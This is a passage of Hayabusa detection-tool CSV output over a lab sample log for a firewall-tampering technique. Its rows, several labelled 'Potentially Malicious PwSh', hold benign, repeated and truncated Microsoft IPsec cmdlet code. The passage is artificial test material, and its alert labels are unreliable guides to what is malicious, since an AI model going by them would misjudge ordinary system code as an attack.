[OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')]",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.329 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"[ValidateNotNull()] 
[string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', 
$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = 
$true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecQuickModeCryptoSet' -Alias '*' function Set-NetIPsecQuickModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('PfsGroup')] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(Paramet",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System 
Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.329 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"[ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] 
[Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecQuickModeCryptoSet' -Alias '*' function Set-NetIPsecQuickModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('PfsGroup')] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(Paramet",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.329 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"erSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) 
$__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 